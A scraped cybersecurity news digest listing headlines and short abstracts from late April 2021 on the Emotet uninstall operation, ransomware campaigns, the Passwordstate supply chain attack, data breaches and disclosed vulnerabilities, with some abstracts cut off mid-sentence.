In a Mimecast survey, a full 79% of respondents indicated their companies had experienced a business disruption, financial loss, or other setbacks in 2020 due to a lack of cyber preparedness.Help Net Security
April 26, 2021 – Botnet
Bye Bye Emotet, law enforcement pushed the uninstall code via the botnet Full Text
Abstract
European law enforcement has conducted an operation aimed at performing a mass-sanitization of computers infected with the infamous Emotet Windows malware. European law enforcement agencies automatically wiped the infamous Emotet malware from infected...Security Affairs
April 26, 2021 – Criminals
Cybercriminals evolving their tactics to exploit collective human interest Full Text
Abstract
Phishing activity increased significantly in the first few months of 2020, taking advantage of pandemic-induced product shortages and increased usage of streaming services, OpenText reveals.Help Net Security
April 26, 2021 – Solution
NFC Forum specifications offer cryptology security for NFC application development Full Text
Abstract
The NFC Authentication Protocol 1.0 Specification (NAP 1.0) provides a framework for using cryptography to establish a secure channel and authentication as well as the bonding between two devices.Help Net Security
April 26, 2021 – Malware
European Law Enforcement Uses Customized DLL to Wipe Emotet Malware from Infected Windows PCs Full Text
Abstract
The code was distributed at the end of January to Emotet-infected computers by the malware's command-and-control (C2) infrastructure, which had just been seized in a multinational police operation.The Register
April 26, 2021 – Malware
Minnesota University Apologizes for Contributing Malicious Code to the Linux Project Full Text
Abstract
Researchers from the University of Minnesota apologized to the maintainers of Linux Kernel Project on Saturday for intentionally including vulnerabilities in the project's code, which led to the school being banned from contributing to the open-source project in the future. "While our goal was to improve the security of Linux, we now understand that it was hurtful to the community to make it a subject of our research, and to waste its effort reviewing these patches without its knowledge or permission," assistant professor Kangjie Lu, along with graduate students Qiushi Wu and Aditya Pakki, said in an email. "We did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches," they added. The apology comes over a study into what's called "hypocrite commits," which was published earlier this February. The project aimed to deliberately add use-after-free vulnerabilThe Hacker News
April 26, 2021 – General
E-commerce Fraud to Exceed $20 Billion in 2021 Full Text
Abstract
Juniper Research backs AI-powered behavioral biometricsInfosecurity Magazine
April 26, 2021 – Botnet
Prometei botnet is targeting ProxyLogon Microsoft Exchange flaws Full Text
Abstract
Attackers are exploiting the ProxyLogon flaws in Microsoft Exchange to recruit machines in a cryptocurrency botnet tracked as Prometei. Experts from the Cybereason Nocturnus Team have investigated multiple incidents involving the Prometei Botnet....Security Affairs
April 26, 2021 – Ransomware
Targeted ransomware attacks grow 767%, India among top targets Full Text
Abstract
The ransomware attacks on high-profile targets such as corporations and government agencies globally increased by a whopping 767% in one year from 2019 to 2020, according to a new report.The Times Of India
April 26, 2021 – Vulnerabilities
Apple AirDrop Bug Could Leak Your Personal Info to Anyone Nearby Full Text
Abstract
New research has uncovered privacy weaknesses in Apple's wireless file-sharing protocol that could result in the exposure of a user's contact information such as email addresses and phone numbers. "As an attacker, it is possible to learn the phone numbers and email addresses of AirDrop users – even as a complete stranger," said a team of academics from the Technical University of Darmstadt, Germany. "All they require is a Wi-Fi-capable device and physical proximity to a target that initiates the discovery process by opening the sharing pane on an iOS or macOS device." AirDrop is a proprietary ad hoc service present in Apple's iOS and macOS operating systems, allowing users to transfer files between devices by making use of close-range wireless communication. While this feature shows only receiver devices that are in users' contact lists by an authentication mechanism that compares an individual's phone number and email address with entrieThe Hacker News
April 26, 2021 – Government
Cyber Ninjas Forges on With Controversial Arizona Election Recount Full Text
Abstract
State senate hires inexperienced consultancy for recountInfosecurity Magazine
April 26, 2021 – Malware
Malware Attack at Technology Provider Radixx Causes Outages in Airline Reservation Systems Full Text
Abstract
Radixx, a technology provider, says a malware attack triggered a dayslong outage that has caused reservations systems to crash at about 20 low-cost airlines around the world.Washington Post
April 26, 2021 – Government
How to Test and Improve Your Domain’s Email Security? Full Text
Abstract
No matter which type of business you are in, whether small, medium, or large, email has become an irrefutable tool for communicating with your employees, partners, and customers. Emails are sent and received each day in bulk by companies from various sources. In addition, organizations may also employ third-party vendors who may be authorized to send emails on behalf of the company. As a result, it becomes increasingly difficult to distinguish between sources that are legitimate and malicious. Here's a solution – PowerDMARC. This SaaS platform helps you assess your email authentication protocols from time to time and see if your domain is secure against spoofing with a DMARC record checker, so you can make changes if necessary. Check Your Domain Today! Use our free tool to examine your domain's DMARC, SPF, DKIM, BIMI, and MTA-STS records instantly to ensure your domain is protected from impersonation and email fraud! Importance of Having Robust Email Security in 2021 SThe Hacker News
April 26, 2021 – Ransomware
Mining technology company Gyrodata hit by ransomware attack – employee data leaked Full Text
Abstract
The data potentially leaked includes names, addresses, birthdates, drivers’ license numbers, social security numbers, passport numbers, W-2 tax forms, and information related to health plan enrolment.The Daily Swig
April 26, 2021 – Vulnerabilities
Bugs Allowed Hackers to Dox John Deere Tractor Owners Full Text
Abstract
A pair of bugs in John Deere's apps and website could have allowed hackers to find and download the personal data of all owners of the company's farming vehicles and equipment, as per a researcher.Vice
April 26, 2021 – Hacker
Hackers are targeting Soliton FileZen file-sharing servers Full Text
Abstract
Experts pointed out that the attacks begun before the vendor has fixed the issues, meaning that we cannot exclude the possibility that threat actors have compromised organizations using FileZen.Security Affairs
April 26, 2021 – Malware
Emotet Malware Destroys Itself Today From All Infected Computers Full Text
Abstract
Emotet, the notorious email-based Windows malware behind several botnet-driven spam campaigns and ransomware attacks, was automatically wiped from infected computers en masse following a European law enforcement operation. The development comes three months after a coordinated disruption of Emotet as part of " Operation Ladybird " to seize control of servers used to run and maintain the malware network. The orchestrated effort saw at least 700 servers associated with the botnet's infrastructure neutered from the inside, thus preventing further exploitation. Law enforcement authorities from the Netherlands, Germany, the U.S., U.K., France, Lithuania, Canada, and Ukraine were involved in the international action. Previously, the Dutch police, which seized two central servers located in the country, said it had deployed a software update to counter the threat posed by Emotet effectively. "All infected computer systems will automatically retrieve the update there, aThe Hacker News
April 26, 2021 – Breach
US Drilling Giant Gyrodata Reveals Employee Data Breach Full Text
Abstract
Ransomware attack earlier this year to blameInfosecurity Magazine
April 26, 2021 – Attack
A supply chain attack compromised the update mechanism of Passwordstate Password Manager Full Text
Abstract
The software company Click Studios was the victim of a supply chain attack, hackers compromised its Passwordstate password management application. Another supply chain attack made the headlines, the Australian software company Click Studios informed...Security Affairs
April 26, 2021 – Breach
Volunteer-run pirate Manga website attacked, loses hashed passwords, has ‘nobody’ to fix the mess Full Text
Abstract
An email to members seen by The Register says that as of April 22, MangaDex operators “have identified that a partial database leak” of members' information has been detected.The Register
April 26, 2021 – Breach
3.2 Billion Leaked Passwords Contain 1.5 Million Records with Government Emails Full Text
Abstract
A staggering number of 3.28 billion passwords linked to 2.18 billion unique email addresses were exposed in what's one of the largest data dumps of breached usernames and passwords. In addition, the leak includes 1,502,909 passwords associated with email addresses from government domains across the world, with the U.S. government alone taking up 625,505 of the exposed passwords, followed by the U.K (205,099), Australia (136,025), Brazil (68,535), and Canada (50,726). The findings come from an analysis of a massive 100GB data set called "COMB21" — aka Compilation of Many Breaches — that was published for free in an online cybercrime forum earlier this February by putting together data from multiple leaks in different companies and organizations that occurred over the years. It's worth noting that a leak doesn't imply a breach of public administration systems. The passwords are said to have been obtained via techniques such as password hash cracking after beingThe Hacker News
April 26, 2021 – Government
Minutes before Trump left office, millions of the Pentagon’s dormant IP addresses sprang to life Full Text
Abstract
After decades of not using a huge chunk of the Internet, the Pentagon has given control of millions of IP addresses to a previously unknown company called Global Resource Systems LLC.Washington Post
April 25, 2021 – Breach
Hacker leaks 20 million alleged BigBasket user records for free Full Text
Abstract
A threat actor has leaked approximately 20 million BigBasket user records containing personal information and hashed passwords on a popular hacking forum.BleepingComputer
April 25, 2021 – Government
Threat Campaign Against Researchers Ongoing, CISA Warns Full Text
Abstract
The CISA notification urges researchers to use sandbox systems isolated from trusted networks when analyzing untrusted websites or codes.Cyware Alerts - Hacker News
April 25, 2021 – Hacker
Hackers are targeting Soliton FileZen file-sharing servers Full Text
Abstract
Threat actors are exploiting two flaws in the popular file-sharing server FileZen to steal sensitive data from businesses and government organizations. Threat actors are exploiting two vulnerabilities in the popular file-sharing server FileZen, tracked...Security Affairs
April 25, 2021 – Malware
Emotet malware nukes itself today from all infected computers worldwide Full Text
Abstract
Emotet, one of the most dangerous email spam botnets in recent history, is being uninstalled today from all infected devices with the help of a malware module delivered in January by law enforcement.BleepingComputer
April 25, 2021 – General
Security Affairs newsletter Round 311 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. A member of the FIN7 group was sentenced to 10 years in prisonIs BazarLoader malware linked to Trickbot...Security Affairs
April 25, 2021 – Vulnerabilities
10,000+ unpatched ABUS Secvest home alarms can be deactivated remotely Full Text
Abstract
10,000+ unpatched ABUS Secvest home alarm systems could be remotely disabled exposing customers to intrusions and thefts. Researchers from Eye Security have found thousands of unpatched ABUS Secvest home alarm systems exposed online despite the vendor...Security Affairs
April 24, 2021 – Vulnerabilities
Critical RCE Bug Found in Homebrew Package Manager for macOS and Linux Full Text
Abstract
A recently identified security vulnerability in the official Homebrew Cask repository could have been exploited by an attacker to execute arbitrary code on users' machines that have Homebrew installed. The issue, which was reported to the maintainers on April 18 by a Japanese security researcher named RyotaK, stemmed from the way code changes in its GitHub repository were handled, resulting in a scenario where a malicious pull request — i.e., the proposed changes — could be automatically reviewed and approved. The flaw was fixed on April 19. Homebrew is a free and open-source software package manager solution that allows the installation of software on Apple's macOS operating system as well as Linux. Homebrew Cask extends the functionality to include command-line workflows for GUI-based macOS applications, fonts, plugins, and other non-open source software. "The discovered vulnerability would allow an attacker to inject arbitrary code into a cask and have it beThe Hacker News
April 24, 2021 – Malware
Prometei: Yet Another Malware Weaponizing Proxylogon Vulnerabilities Full Text
Abstract
The Prometei variant used in the recent attack was found to provide the attackers with a stealthy and sophisticated backdoor that supported a wide range of tasks, along with harvesting credentials.Cyware Alerts - Hacker News
April 24, 2021 – Breach
Passwordstate Password Manager Update Hijacked to Install Backdoor on Thousands of PCs Full Text
Abstract
Click Studios, the Australian software company behind the Passwordstate password management application, has notified customers to reset their passwords following a supply chain attack. The Adelaide-based firm said a bad actor used sophisticated techniques to compromise the software's update mechanism and used it to drop malware on user computers. The breach is said to have occurred between April 20, 8:33 PM UTC, and April 22, 0:30 AM UTC, for a total period of about 28 hours. "Only customers that performed In-Place Upgrades between the times stated above are believed to be affected," the company said in an advisory. "Manual Upgrades of Passwordstate are not compromised. Affected customers password records may have been harvested." The development was first reported by the Polish tech news site Niebezpiecznik . It's not immediately clear who the attackers are or how they compromised the password manager's update feature. Click Studios said an iThe Hacker News
April 24, 2021 – Ransomware
A ransomware gang made $260,000 in 5 days using the 7zip utility Full Text
Abstract
A ransomware gang has made $260,000 in just five days simply by remotely encrypting files on QNAP devices using the 7zip archive program.BleepingComputer
April 24, 2021 – Ransomware
NitroRansomware Demands Discord Gift Codes Full Text
Abstract
A new ransomware strain dubbed NitroRansomware is encrypting victim's files and then asking for a $9.99 Discord Nitro gift code to decrypt files. It gives a .givemenitro extension to encrypted files.Cyware Alerts - Hacker News
April 24, 2021 – Malware
New cryptomining malware builds an army of Windows, Linux bots Full Text
Abstract
A recently discovered cryptomining botnet is actively scanning for vulnerable Windows and Linux enterprise servers and infecting them with Monero (XMRig) miner and self-spreader malware payloads.BleepingComputer
April 24, 2021 – Malware
XCSSET Malware is Now Targeting Apple’s M1 Chip Full Text
Abstract
A Mac malware has been re-engineered and being used in a campaign aimed at Apple’s new M1 chips to eventually steal data associated with popular applications including Evernote, WeChat, and more.Cyware Alerts - Hacker News
April 24, 2021 – General
The cybersecurity researcher Dan Kaminsky has died Full Text
Abstract
The cybersecurity community has lost its star, the popular hacker Dan Kaminsky has passed away. The popular cyber security researcher Dan Kaminsky (42) has passed away. Dan is a star, a myth, and a beacon for us. At the moment the causes of death...Security Affairs
April 24, 2021 – Malware
Fake Microsoft DirectX 12 site pushes crypto-stealing malware Full Text
Abstract
Cybercriminals have created a fake Microsoft DirectX 12 download page to distribute malware that steals your cryptocurrency wallets and passwords.BleepingComputer
April 24, 2021 – Government
Biden administration unveils plan to defend electric sector from cyberattacks Full Text
Abstract
The Biden administration is buckling down on cyber threats to U.S. power infrastructure. The Department of Energy (DOE) announced a 100-day plan to help shore up the U.S. electric power system against cyber threats.Cyberscoop
April 24, 2021 – Malware
ToxicEye RAT exploits Telegram communications to steal data from victims Full Text
Abstract
ToxicEye is a new Remote Access Trojan (RAT) that exploits the Telegram service as part of it command and control infrastructure. ToxicEye RAT is a new malware that leverages the Telegram services for command & control, experts from Check Point...Security Affairs
April 24, 2021 – Breach
HashiCorp is the latest victim of Codecov supply-chain attack Full Text
Abstract
Open-source software tools and Vault maker HashiCorp has disclosed a security incident that occurred due to the recent Codecov attack. HashiCorp, a Codecov customer, has stated that the recent Codecov supply-chain attack aimed at collecting developer credentials led to the exposure of HashiCorp's GPG signing key.BleepingComputer
April 24, 2021 – Business
KnowBe4 Issues IPO to Drive Global Expansion, New Automation Features Full Text
Abstract
Security awareness company KnowBe4 successfully debuted on the NASDAQ, with its initial public offering bringing in more than $150 million to fund the company's international expansion and a focus on new automation and machine learning features.Dark Reading
April 24, 2021 – Botnet
A new Linux Botnet abuses IaC Tools to spread and other emerging techniques Full Text
Abstract
A new Linux botnet uses Tor through a network of proxies using the Socks5 protocol, abuses legitimate DevOps tools, and other emerging techniques. Researchers from Trend Micro have spotted a new Linux botnet employing multiple emerging techniques...Security Affairs
April 24, 2021 – Phishing
Twitter alarms users with messages that resembled phishing emails Full Text
Abstract
Twitter sparked panic among users that they were the subjects of a phishing attack in what was instead an accidental mass email. The message sent to some Twitter users went out asking them to confirm their email addresses by clicking on a button.Cyberscoop
April 24, 2021 – Vulnerabilities
Unsecured Kubernetes Instances Could Be Vulnerable to Exploitation Full Text
Abstract
Kubernetes clusters can and should be configured for greater security, but when left unsecured, these clusters can be accessed anonymously by anyone who knows their IPs, ports, and APIs.Palo Alto Networks
April 23, 2021 – Ransomware
The Week in Ransomware - April 23rd 2021 - A brutal week Full Text
Abstract
This week has been brutal, not because of many ransomware variants released but due to a single ransomware campaign that affected thousands of people.BleepingComputer
April 23, 2021 – Business
Fraud prevention platform Sift raises $50M at over $1B valuation, eyes acquisitions Full Text
Abstract
Sift has raised $50 million in a funding round that values the company at over $1 billion. Insight Partners led the financing, which included participation from Union Square Ventures and Stripes.TechCrunch
April 23, 2021 – General
Hillicon Valley: Facebook, Twitter, YouTube execs to testify at Senate hearing on algorithms | Five big players to watch in Big Tech’s antitrust fight Full Text
Abstract
Washington is ramping up efforts to rein in the market power of the largest tech companies in the United States, and some members of Congress and some of President BidenJoe BidenBiden announces picks to lead oceans, lands agencies Overnight Defense: Top general concerned about Afghan forces after US troops leave | Pentagon chief: Climate crisis 'existential' threat to US national security | Army conducts review after 4 Black soldiers harassed at Virginia IHOP Feds expect to charge scores more in connection to Capitol riot MORE's nominees are set to play a big role. Meanwhile, Congress is also examining the impact of social media platforms’ algorithms, and executives from Facebook, Twitter and YouTube are set to testify at a Senate hearing next week.The Hill
April 23, 2021 – Policy and Law
Californian Charged with Cyberstalking Teenage Boys Full Text
Abstract
Brentwood woman allegedly bombarded three boys with abusive messages for yearsInfosecurity Magazine
April 23, 2021 – Government
The Biden Administration’s Impending Executive Order on Software Security Full Text
Abstract
Executive branch action on software security is sorely needed, but should focus primarily on risk management rather than merely new reporting requirements.Lawfare
April 23, 2021 – Ransomware
New Qlocker ransomware infected hundreds of QNAP NAS devices in a few days Full Text
Abstract
A new ransomware strain dubbed Qlocker is infecting hundreds of QNAP NAS devices every day and demanding a $550 ransom payment. Experts are warning of a new strain of ransomware named Qlocker that is infecting hundreds of QNAP NAS devices on daily...Security Affairs
April 23, 2021 – Government
Following similar move in US, Europol prepares coup de gras for Emotet’s remains Full Text
Abstract
Emotet’s final undoing comes two weeks after a similar FBI operation sent a kill command to hundreds of Microsoft Exchange servers, ordering web shells to delete themselves. But there are differences in subtlety and scope.SCMagazine
April 23, 2021 – Hacker
Oscar-Bait, Literally: Hackers Abuse Nominated Films for Phishing, Malware Full Text
Abstract
Judas and the Black Messiah may be a favorite for Best Picture at the 93rd Academy Awards on Sunday, but it’s a fave for cybercriminals too.Threatpost
April 23, 2021 – Attack
Passwordstate password manager hacked in supply chain attack Full Text
Abstract
Click Studios, the company behind the Passwordstate password manager, notified customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks.BleepingComputer
April 23, 2021 – Botnet
New Golang-based Sysrv Cryptomining Botnet Targets Popular Enterprise Applications Full Text
Abstract
As analyzed in reports from security researchers at Alibaba’s Aliyun, Juniper, and Lacework, Sysrv’s internal architecture follows the classic makeup of 99% of most botnets today.The Record
April 23, 2021 – Policy and Law
Senators introduce legislation to protect critical infrastructure against attack Full Text
Abstract
Sens. Maggie Hassan (D-N.H.) and Ben SasseBen SasseSenate GOP keeps symbolic earmark ban On The Money: Senate GOP faces post-Trump spending brawl | Senate confirms SEC chief Gensler to full five-year term | Left-leaning group raises concerns about SALT cap repeal Senate GOP faces post-Trump spending brawl MORE (R-Neb.) on Friday introduced legislation intended to protect critical infrastructure from cyberattacks and other national security threats.The Hill
April 23, 2021 – General
US Cyber Games Launches Cyber Open and Combine Full Text
Abstract
America begins nationwide search for cybersecurity’s most talentedInfosecurity Magazine
April 23, 2021 – Business
50 companies named trusted providers by Cloud Security Alliance Full Text
Abstract
The Cloud Security Alliance (CSA) on Thursday announced the selection of a first round of “trusted providers” for cloud security. In a press announcement, the group said a Trusted Cloud Provider “trustmark” will get displayed on each organization’s CSA Security, Trust, Assurance & Risk (STAR) registry. The CSA hopes this will assist security teams in…SCMagazine
April 23, 2021 – Phishing
Phishing impersonates global recruitment firm to push malware Full Text
Abstract
An ongoing phishing campaign is impersonating Michael Page consultants to push Ursnif data-stealing malware capable of harvesting credentials and sensitive data from infected computers.BleepingComputer
April 23, 2021 – Criminals
US: Ireland Is a Target for Cyber-Criminals Full Text
Abstract
Vast amount of data stored on Emerald Isle a lure for cyber-criminals, warns America’s National Security DivisionInfosecurity Magazine
April 23, 2021 – Attack
Researchers say enterprise password manager hit in supply chain attack Full Text
Abstract
In an April 23 blog, the firm said they have digital evidence that Australian company ClickStudios suffered a breach, sometime between April 20 and April 22, that resulted in the attacker dropping a corrupted update to their password manager Passwordstate via a zip file containing a dynamic link library with malicious code.SCMagazine
April 23, 2021 – Government
GCHQ Director: The UK and Allies Must Counter “Existential Threat” to the Digital Environment Full Text
Abstract
The UK must react to China's attempts to control the global operating systemInfosecurity Magazine
April 23, 2021 – Ransomware
Ransomware gang offers traders inside scoop on attack victims so they can short sell their stocks Full Text
Abstract
The latest fallout of ransomware attacks may involve stock manipulation, with one group openly coaxing stock traders to reach out and receive the inside scoop on the gang’s latest corporate victims, so they can short sell their stock before data is leaked and the news goes public.SCMagazine
April 23, 2021 – Vulnerabilities
New Supply Chain Exploit in CocoaPods Impacts Three Million Mobile Apps Full Text
Abstract
A remote code execution (RCE) vulnerability in the central CocoaPods server could have potentially impacted up to three million mobile apps that relied on the open source package manager.The Daily Swig
April 23, 2021 – Vulnerabilities
New QNAP NAS Flaws Exploited In Recent Ransomware Attacks - Patch It! Full Text
Abstract
A new ransomware strain called " Qlocker " is targeting QNAP network attached storage (NAS) devices as part of an ongoing campaign and encrypting files in password-protected 7zip archives. First reports of the infections emerged on April 20, with the adversaries behind the operations demanding a bitcoin payment (0.01 bitcoins or about $500.57) to receive the decryption key. In response to the ongoing attacks, the Taiwanese company has released an advisory prompting users to apply updates to QNAP NAS running Multimedia Console, Media Streaming Add-on, and HBS 3 Hybrid Backup Sync to secure the devices from any attacks. "QNAP strongly urges that all users immediately install the latest Malware Remover version and run a malware scan on QNAP NAS," the company said . "The Multimedia Console, Media Streaming Add-on, and Hybrid Backup Sync apps need to be updated to the latest available version as well to further secure QNAP NAS from ransomware attacks."The Hacker News
April 23, 2021 – Botnet
Last Chance for Forensics Teams Ahead of Emotet Sunday Deadline Full Text
Abstract
Notorious botnet will be removed from global machines at the weekendInfosecurity Magazine
April 23, 2021 – Privacy
A Multilateral Surveillance Accord: Setting the Table Full Text
Abstract
Stakeholders are increasingly advocating for a multilateral accord on government surveillance.Lawfare
April 23, 2021 – Ransomware
Million-dollar deposits and friends in high places: how we applied for a job with a ransomware gang Full Text
Abstract
In June 2020, a user called ‘Unknown’ submitted a rather peculiar post on a popular Russian hacker forum, looking for people to join their ‘affiliate program’ which was believed to be from REvil.Security Affairs
April 23, 2021 – Botnet
Tor-Based Botnet Malware Targets Linux Systems, Abuses Cloud Management Tools Full Text
Abstract
As Linux attracts more attention from malicious actors, researchers have seen threats evolving — abusing services like Ngrok and using functions to hunt and kill other competing malware.Trend Micro
April 23, 2021 – Ransomware
Darkside Ransomware Gang Plans to Extort NASDAQ-listed Victims by Shorting Their Stock Prices Full Text
Abstract
The operators of the Darkside ransomware are expanding their extortion tactics with a new technique aimed at companies that are listed on NASDAQ or other stock markets globally.The Record
April 23, 2021 – Government
CISA Warns of ICS Vulnerabilities in Horner Automation Cscape and Mitsubishi Electric GOT Full Text
Abstract
The DHS's Cybersecurity and Infrastructure Security Agency (CISA) today issued ICS advisories for vulnerabilities in the Horner Automation Cscape software and the Mitsubishi Electric GOT.Dark Reading
April 23, 2021 – Phishing
Another BitCoin Exchange Scam—This Time “Live” on YouTube Full Text
Abstract
Essentially, this is a typical scam, much like the recent Bitcoin exchange scams seen on Twitter. But this is a first for the YouTube platform. And it also made the claim that it was LIVE.Fortinet
April 23, 2021 – Ransomware
Stanford student finds glitch in ransomware payment system to save victims $27,000 Full Text
Abstract
The hackers behind a nascent strain of ransomware hit a snag this week when a security researcher found a flaw in the payment system and, he says, helped victims save $27,000 in potential losses.Cyberscoop
April 23, 2021 – Breach
Lockdown Hotel Bookings at Risk Due to DMARC Fail Full Text
Abstract
Proofpoint claims half of UK hotels not using anti-phishing protocolInfosecurity Magazine
April 23, 2021 – Malware
TLS-Encrypted Malware Volumes Double in Just Months Full Text
Abstract
Sophos warns of increasing use of legitimate web services to hide malwareInfosecurity Magazine
April 23, 2021 – General
SolarWinds hack analysis reveals 56% boost in command server footprint Full Text
Abstract
On Thursday, RiskIQ researchers published a report on the network infrastructure footprint of SolarWinds-linked cyberattackers, labeling it as "significantly larger than previously identified."ZDNet
April 23, 2021 – Vulnerabilities
Signal Says Cellebrite Mobile Device Analysis Products Can Be Hacked Full Text
Abstract
Cellebrite’s forensic applications do not include the type of security protections one would expect from a parsing software, which renders them susceptible to attacks, according to Signal.Security Week
April 23, 2021 – Phishing
Analysis of New FormBook Variant Delivered in Phishing Campaign Full Text
Abstract
FormBook is a malware designed to steal sensitive information from a victim’s device as well as to receive control commands to perform additional malicious tasks on that device.Fortinet
April 23, 2021 – Attack
Evil Maid Attack – Vacuum Hack Full Text
Abstract
Evil Maid Attack - Weaponizing an harmless vacuum cleaner hiding within it a small Rogue Device such as a Raspberry Pi. It is a typical day at the office. You are sitting at your desk, working hard at whatever it is that you do. The cleaning lady...Security Affairs
April 23, 2021 – Botnet
Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers Full Text
Abstract
Attackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research. "Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more," Boston-based cybersecurity firm Cybereason said in an analysis summarizing its findings. First documented by Cisco Talos in July 2020, Prometei is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and "increase the amount of systems participating in its Monero-mining pool." "Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted inThe Hacker News
April 23, 2021 – Ransomware
Darkside Ransomware gang aims at influencing the stock price of their victims Full Text
Abstract
The Darkside ransomware gang is enhancing its extortion tactics to interfere with the valuation of stocks of companies that are listed on NASDAQ or other stock markets. The Darkside ransomware operators are stepping up their extortion tactics targeting...Security Affairs
April 23, 2021 – Accident
Twitter accidentally sends suspicious emails asking to confirm accounts Full Text
Abstract
Twitter caused quite the panic Thursday night when they accidentally sent emails asking users to confirm their accounts, which looked suspiciously like a phishing attack.BleepingComputer
April 23, 2021 – Accident
Twitter accidentally sends suspicious emails asking to confirm accounts Full Text
Abstract
Twitter caused quite the panic Thursday night when they accidentally sent emails asking users to confirm their accounts, which looked suspiciously like a phishing attack.BleepingComputer
April 22, 2021 – Business
KnowBe4 CEO Stu Sjouwerman talks IPO, and ‘strengthening that human firewall’ Full Text
Abstract
SC Media caught up with CEO and founder Stu Sjouwerman on the company’s plans to expand international sales and leverage automation and machine learning to further explore the human layer of cybersecurity.SCMagazine
April 22, 2021 – General
Hillicon Valley: Acting FTC chair blasts Supreme Court decision limiting agency consumer power | Police tech under scrutiny following Chicago shooting Full Text
Abstract
The chair of the Federal Trade Commission criticized a Supreme Court decision handed down Thursday that limits how the agency can punish companies engaging in deceptive practices. Meanwhile, certain kinds of technologies used by law enforcement have come under scrutiny following the shooting of 13-year-old Adam Toledo in Chicago, and two Senate Democrats are raising concerns around the safety and security of Tesla vehicles.The Hill
April 22, 2021 – General
Vendors are getting better at spotting malicious execution techniques Full Text
Abstract
Cybersecurity enterprise solutions are getting better at recognizing malicious activity conducted via APIs and Windows Management Instrumentation tools.SCMagazine
April 22, 2021 – Malware
Malware operators leverage TLS in 46% of detected communications Full Text
Abstract
Malware operators have also been adopting TLS for essentially the same reasons as legitimate companies: To prevent defenders from detecting and stopping the deployment of malware and data theft.SCMagazine
April 22, 2021 – Government
New chief of Carnegie Mellon’s CERT: Feds needs to do better with info sharing Full Text
Abstract
Rather than limit focus to indicators of compromise, CERT’s new director, Greg Touhill said government needs “to do a better job of making sure that what information we share has contextual elements, and is timely.”SCMagazine
April 22, 2021 – Botnet
Botnet backdoors Microsoft Exchange servers, mines cryptocurrency Full Text
Abstract
Unpatched Microsoft Exchange servers are being targeted by the Prometei botnet and added to its operators' army of Monero (XMR) cryptocurrency mining bots.BleepingComputer
April 22, 2021 – Ransomware
Mount Locker Ransomware Aggressively Changes Up Tactics Full Text
Abstract
The ransomware is upping its danger quotient with new features while signaling a rebranding to “AstroLocker.”Threatpost
April 22, 2021 – Criminals
Spotlight on the Cybercriminal Supply Chains Full Text
Abstract
In this Threatpost podcast Fortinet’s top researcher outlines what a cybercriminal supply chain is and how much the illicit market is worth.Threatpost
April 22, 2021 – Phishing
FlixOnline Poses as Netflix to Steal WhatsApp Conversations Data Full Text
Abstract
New research unveiled an Android malware, disguised as an app called FlixOnline, that entices users by promising free Netflix subscriptions and spread further by creating auto-replies to messages in WhatsApp.Cyware Alerts - Hacker News
April 22, 2021 – Phishing
Cybercriminals use Telegram Bots and Google Forms for Automated Phishing Full Text
Abstract
Group-IB found that cybercriminals are frequently using legitimate services including Google Forms and Telegram bots to collect stolen data from exploit kits during phishing attacks.Cyware Alerts - Hacker News
April 22, 2021 – Vulnerabilities
Trend Micro flaw actively exploited in the wild Full Text
Abstract
The issue resides in the logic that controls access to the Misc folder, it could be exploited by an attacker to escalate privileges and execute code in the context of SYSTEM.Security Affairs
April 22, 2021 – Criminals
Way Too Many Cybercriminal Groups Active Presently Full Text
Abstract
A new report disclosed that, with more than 1,900 hacker groups active, including APTs, the current cybercrime landscape is witnessing a rise in new malware variants that are being deployed in the wild.Cyware Alerts - Hacker News
April 22, 2021 – Phishing
Costco Issues Scam Warning Full Text
Abstract
Membership-only big-box wholesaler tells Americans to be wary of 14 digital scamsInfosecurity Magazine
April 22, 2021 – Vulnerabilities
Rockwell Industrial Switches Affected by More Vulnerabilities in Cisco Software Full Text
Abstract
Rockwell Automation has started releasing firmware updates for some of its Stratix switches to address another round of vulnerabilities introduced by the use of Cisco’s IOS XE software.Security Week
April 22, 2021 – Policy and Law
Google Ordered to Provide Info on Alleged Cyber-bullies Full Text
Abstract
Canadian court orders tech giant to reveal who is behind blog dishing out alleged online harassmentInfosecurity Magazine
April 22, 2021 – Privacy
Privacy and security in the software designing Full Text
Abstract
The importance of carrying out a careful risk and impact assessment in order to safeguard the security of the information and the data privacy. In order to reduce as much as possible the vulnerabilities and programming errors that can affect not only...Security Affairs
April 22, 2021 – Malware
Telegram Platform Abused in ‘ToxicEye’ Malware Campaigns Full Text
Abstract
Even if the app is not installed or in use, threat actors can use it to spread malware through email campaigns and take over victims’ machines, new research has found.Threatpost
April 22, 2021 – Vulnerabilities
Cellebrite ‘s forensics tool affected by arbitrary code execution issue Full Text
Abstract
Cellebrite mobile forensics tool Ufed contains multiple flaws that allow arbitrary code execution on the device, SIGNAL creator warns. Moxie Marlinspike, the creator of the popular encrypted messaging app Signal, announced that Cellebrite mobile forensics...Security Affairs
April 22, 2021 – Outage
Exchange Online down: Microsoft 365 outage affects email delivery Full Text
Abstract
A Microsoft 365 outage is preventing Exchange Online users from sending and receiving emails, with messages being stuck in transit and not reaching the recipients' inboxes.BleepingComputer
April 22, 2021 – Vulnerabilities
Researchers Discover Ways to Leak Contact Information by Exploiting Privacy Weaknesses in Apple AirDrop Full Text
Abstract
A bug-hunting team at Technische Universität Darmstadt in Germany reverse engineered AirDrop and found that senders and receivers may leak their contact details in the process.The Register
April 22, 2021 – General
INTERPOL to Work with The Coalition Against Stalkerware to Tackle Surge in Domestic Violence Full Text
Abstract
INTERPOL will work with the coalition to improve the abilities of police forces to tackle this growing issueInfosecurity Magazine
April 22, 2021 – Vulnerabilities
QNAP removes backdoor account in NAS backup, disaster recovery app Full Text
Abstract
QNAP has addressed a critical vulnerability allowing attackers to log into QNAP NAS (network-attached storage) devices using hardcoded credentials.BleepingComputer
April 22, 2021 – Botnet
Massive Android Botnet Uses Spoofed Apps to Serve Hundreds of Millions of Fraud Ad Requests on Smart TVs Full Text
Abstract
